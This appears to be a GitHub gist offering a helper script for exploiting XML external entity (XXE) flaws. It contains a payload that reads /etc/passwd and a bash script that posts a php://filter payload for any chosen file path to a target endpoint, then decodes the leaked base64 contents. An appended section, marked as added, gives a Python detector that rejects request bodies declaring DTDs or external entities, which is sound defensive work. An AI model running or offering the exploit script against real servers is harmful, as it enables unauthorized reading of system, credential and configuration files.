@AvasDream
Last active July 7, 2018 10:27
Helper script for exploiting XXE

Basics

Source

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

Base64 "encoded" traffic

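#!/bin/bash
# Usage: pass the resource to read as the first argument ($1).
# Build the request body; the php://filter wrapper base64-encodes the resource.
echo "<?xml version=\"1.0\"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM \"php://filter/read=convert.base64-encode/resource=$1\" >]>
<details>
<subnet_mask>&xxe;</subnet_mask>
<test></test>
</details>
" > tmp.txt
# Send the body and save the response.
curl -s -d @tmp.txt -X POST http://x.x.x.x/x.php > out.txt
# Keep the 7th space-separated field of the response (the base64 text).
cut -d" " -f 7 out.txt > out1.txt
# Strip all whitespace so base64 gets one clean string.
tr -d " \t\n\r" < out1.txt > out2.txt

base64 --decode out2.txt

# Remove only the files this script created.
rm tmp.txt out.txt out1.txt out2.txt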
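
Both payloads above depend on the server-side parser resolving the external entity they declare, so a request filter can flag them before that parser runs. The following is an added example, not part of the original gist: it uses Python's expat binding to list the external entities a body declares. The sample bodies are constructed from the payloads above (`/example/path` is a made-up stand-in for `$1`), and the reject-any-DTD policy is an assumption.

```python
import xml.parsers.expat
from urllib.parse import urlsplit

# Constructed sample bodies: the first two mirror the payloads on this page
# (the resource path in the second is a made-up stand-in for "$1").
FILE_PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds><user>&xxe;</user><pass>mypass</pass></creds>"""
FILTER_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/example/path" >]>
<details><subnet_mask>&xxe;</subnet_mask><test></test></details>"""
BENIGN = b"<creds><user>alice</user><pass>mypass</pass></creds>"


def inspect_body(body: bytes) -> dict:
    """Record what the DTD declares. With no ExternalEntityRefHandler set,
    expat skips external entity references instead of fetching them."""
    report = {"doctype": False, "external_entities": [], "error": None}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = True

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:  # SYSTEM/PUBLIC entity: content comes from a URI
            scheme = urlsplit(system_id).scheme or "relative"
            report["external_entities"].append((name, scheme, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(body, True)
    except xml.parsers.expat.ExpatError as exc:
        report["error"] = str(exc)
    return report


def verdict(body: bytes) -> str:
    """Assumed policy: clients of this endpoint never need to send a DTD."""
    r = inspect_body(body)
    if r["external_entities"]:
        return "reject:external-entity"
    if r["doctype"] or r["error"]:
        return "reject:doctype-or-malformed"
    return "accept"
```

Logging the scheme and system identifier from `inspect_body` alongside the rejection gives responders the exact resource a request tried to reference.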